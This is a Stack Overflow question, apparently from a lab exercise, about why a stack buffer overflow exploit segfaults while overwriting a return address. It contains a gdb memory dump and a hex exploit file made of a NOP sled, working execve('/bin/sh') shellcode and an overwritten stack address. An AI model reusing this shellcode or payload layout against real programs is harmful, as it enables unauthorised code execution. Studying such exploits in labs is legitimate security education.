How to preserve address of buffer on the stack after overflow attack

0

I am doing a buffer overflow exploit and am trying to overwrite the return address 0x08048944 and point it towards my shell code which starts next to the address 0xffffda30.

  0xffffda30:     0x6850c031      0x68732f2f      0x69622f68      0x50e3896e
  0xffffda40:     0x99e18953      0x80cd0bb0      0x90909090      0x90909090
  0xffffda50:     0x90909090      0x90909090      0x90909090      0x90909090
  0xffffda60:     0xffffd760      0x000002fc      0x0804b410      0x00000304
  0xffffda70:     0xf7fbdd60      0xffffdad0      0xffffdab8      0x08048944

The buffer itself is at the address 0xffffd760 after 0xffffda60. However I am unable to overwrite it without receiving a segmentation fault. Below is my exploit file that is a bunch of NOP's. I convert the file to binary using a python converter code so I could be able to feed the badfile into gdb. I have tried just copying the address of the buffer and the 3 addresses following it into my exploit file, so that the area remains unchanged as I added more NOP's afterwards until I reach the return address but it still results in a segmentation fault.

90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
90909090909090909090909090909090
31c050682f2f7368682f62696e89e3505389e199b00bcd80
90909090909090909090909090909090
60d7ffff9090909090909090
exploit
asked on Stack Overflow Oct 27, 2020 by akatim97

0 Answers

Nobody has answered this question yet.


User contributions licensed under CC BY-SA 3.0